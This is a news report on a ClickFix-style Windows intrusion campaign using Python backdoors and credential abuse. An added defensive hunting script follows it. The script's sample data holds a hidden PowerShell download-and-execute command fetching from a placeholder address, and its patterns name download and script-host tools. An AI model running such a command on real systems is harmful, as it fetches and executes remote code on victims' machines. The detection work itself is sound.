ClickFix access broker campaign hits Windows with Python-driven backdoors

Businesses are being warned about a new cyber campaign targeting Windows environments where getting in is only the beginning – not the end – of the attack.
Researchers say this ClickFix-style activity quickly moves beyond initial access, using Python-based tools, multiple backdoors, and stolen credentials to maintain long-term control inside corporate networks.
The campaign begins with a simple trick: persuading an employee to press 'Windows + R', type a command, and hit 'Enter'.
The activity uses a “CrashFix”-style approach – part of the wider ClickFix tactic recently documented by Microsoft – where employees are shown convincing error messages or fake IT prompts telling them something is broken and needs a quick fix.
The instructions feel routine, but the command subtly opens the door for attackers.
Last November, security firm Huntress reported a sophisticated ClickFix campaign that relies on fake Windows updates to trick users. However, in this instance, researchers at ARC Labs say the operation is notably more advanced, using Python-driven backdoors and other methods to maintain long-term access after entry.
Describing the attacker’s methods in a blog, ARC Labs – security firm Binary Defense’s threat research group – wrote that this reflects a broader shift in how attacks unfold inside organizations.
“Social engineering replaces exploits and malware is delivered through user interaction rather than vulnerability abuse,” ARC Labs researchers flagged.
Blending into systems, using Python backdoors
Once the command is executed, the attackers avoid dropping conventional malware binaries and instead rely on legitimate Windows tools and in-memory scripts to blend into normal system behaviour.
What distinguishes the campaign is the way access is maintained and expanded. Investigators observed extensive use of scripting and multiple backdoors deployed at once, allowing attackers to remain embedded even if one route is detected.
"Analysis of recovered artifacts confirmed the attacker deployed multiple independent implants, rather than relying on a single payload. The primary Python implant functioned as a lightweight backdoor capable of command execution, host reconnaissance, and follow-on payload delivery, largely orchestrating living-off-the-land activity through native Windows utilities and PowerShell rather than custom binaries."
ARC Labs
Researchers added that additional Python scripts (extentions.py, updates.py, udp.pyw) were deployed after initial access. In parallel, the attacker deployed “a reflectively loaded DLL backdoor”, which was also designed to avoid detection.
They also observed a clear transition to hands-on-keyboard activity, including active credential abuse and AD exploitation. They said the presence of multiple backdoors and sustained reconnaissance indicated a focus on maintaining long-term access, rather than quick monetization.
"The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy. By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult. This layered tooling aligns more closely with interactive intrusion and access brokerage operations than with single-purpose malware delivery."
ARC Labs
"From a defender’s perspective, this blurs the line between scripting abuse and traditional malware."
Targets include Active Directory
The intrusion then moves beyond automated compromise into direct operator involvement. Attackers begin mapping networks, identifying valuable systems, and targeting identity infrastructure such as Active Directory (AD).
ARC reports that the behavior has already been observed in real organizational environments, where attackers installed persistent access, moved laterally across systems, and authenticated using compromised credentials.
Researchers stopped short of naming a specific ransomware gang, but say the activity strongly aligns with the access-broker ecosystem – criminal groups that specialize in breaking into organizations and selling the access on for later attacks.
Although no ransomware was deployed in the incidents analyzed, the same foothold could later support data theft, extortion, or disruption.
The activity appears closely related to the CrashFix ClickFix variant documented by Microsoft last week, which also involved Python-based malware delivery. However, ARC researchers say this intrusion goes further, showing what happens after initial access – including credential abuse, multiple backdoors and hands-on-keyboard activity inside Windows networks.
Prevention should be focused on the entry point, security researchers advise. Staff should treat unsolicited instructions, especially requests to open the Run dialog and paste a command, as a major warning sign, and should be mindful that the most dangerous part of this campaign is not how attackers get in, but what they do once they’re inside.
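The two artefacts this article describes, the command pasted into the Run box and the console-less Python implants that follow it, are both observable on the endpoint. The script below is an added illustration written for this page; it is not code from ARC Labs, Microsoft or Cybernews. It rebuilds a user's Win+R history from the RunMRU registry key (Windows stores each Run-box command there, most recent first) and flags download-and-execute patterns in it, then triages Sysmon-style process-creation records for commands spawned under explorer.exe and for pythonw.exe/.pyw scripts started from user-writable paths. The indicator patterns are generic ClickFix tradecraft rather than this campaign's exact strings, the field names follow Sysmon Event ID 1, and every sample entry, address, path and file name is constructed for the example rather than taken from the incident.

```python
"""Hunt for ClickFix-style Run-box abuse and the console-less Python implants that
follow it. Added example, not ARC Labs'/Microsoft's code; all sample data is constructed."""
import re

# Generic ClickFix tradecraft seen in Run-box commands, not this campaign's exact strings.
RUN_BOX_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|bitsadmin|certutil)\b", re.I),
    "inline_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "script_host": re.compile(r"\b(?:mshta|wscript|cscript|regsvr32|rundll32)(?:\.exe)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}
# An encoded command counts on both sides: it executes something and hides what.
EXEC_PRIMITIVES = {"download_cradle", "inline_eval", "script_host", "encoded_cmd"}
EVASION_MARKERS = {"remote_url", "hidden_window", "encoded_cmd"}

# Paths an unprivileged user can write to: where a dropped implant has to live.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|ProgramData|Windows\\Temp)\\", re.I)
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}
LAUNCHER_PARENTS = {"explorer.exe", "powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_runmru(values: dict) -> list:
    """Win+R history lives in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
    one lettered value per command stored as '<command>\\1', plus MRUList, whose letters give
    most-recent-first order. Returns the commands in that order."""
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def score_command(cmd: str) -> list:
    return [name for name, rx in RUN_BOX_PATTERNS.items() if rx.search(cmd)]


def is_clickfix_candidate(cmd: str) -> bool:
    # Need an execute-remote-content primitive AND a URL/evasion flag, so that
    # 'cmd /c ipconfig' or a pasted UNC path does not fire.
    hits = set(score_command(cmd))
    return bool(hits & EXEC_PRIMITIVES) and bool(hits & EVASION_MARKERS)


def python_implant_reasons(event: dict) -> list:
    """Why a Sysmon Event ID 1-style record looks like a dropped Python implant."""
    image = _basename(event["Image"])
    if image not in PYTHON_IMAGES:
        return []
    cmd, reasons = event["CommandLine"], []
    if image == "pythonw.exe" or re.search(r"\.pyw\b", cmd, re.I):
        reasons.append("console-less python (pythonw/.pyw)")  # nothing for the user to notice
    if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(event["Image"]):
        reasons.append("script or interpreter in user-writable path")
    parent = _basename(event.get("ParentImage", ""))
    if parent in LAUNCHER_PARENTS:
        reasons.append("spawned by " + parent)
    return reasons


def triage_events(events: list) -> list:
    """Return (command_line, reasons) for the events worth an analyst's time."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"]
        # Whatever is typed into Win+R runs as a child of explorer.exe.
        if _basename(ev.get("ParentImage", "")) == "explorer.exe" and is_clickfix_candidate(cmd):
            findings.append((cmd, ["download-and-execute launched from Run box (parent explorer.exe)"]))
        reasons = python_implant_reasons(ev)
        if len(reasons) >= 2:  # one weak signal (a developer running python from cmd.exe) is noise
            findings.append((cmd, reasons))
    return findings


# Constructed sample data: a RunMRU export and Sysmon-style process-creation events.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://203.0.113.10/f.ps1 | iex"\\1',
    "c": "\\\\fileserver\\share\\1",
    "MRUList": "bca",
}
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://203.0.113.10/f.ps1 | iex"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Programs\Python\Python312\pythonw.exe",
     "CommandLine": r"pythonw.exe C:\Users\alice\AppData\Roaming\udp.pyw",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Program Files\Python312\python.exe",  # benign developer: one weak signal only
     "CommandLine": r"python.exe C:\dev\app\manage.py runserver",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for cmd in parse_runmru(SAMPLE_RUNMRU):
        print(("SUSPECT  " if is_clickfix_candidate(cmd) else "         ") + cmd)
    for cmd, reasons in triage_events(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(reasons))
```

On a real host the RunMRU key can be exported with `reg export` and converted to the name/value mapping `parse_runmru` expects; it survives reboots, so it is worth collecting during triage even if process telemetry has rolled over. Removing the Run box through the Explorer policy value NoRun closes this particular entry point, but ClickFix lures also exist that direct the user to a PowerShell or Terminal window instead, which is why the example looks at what runs afterwards as well as at what was pasted.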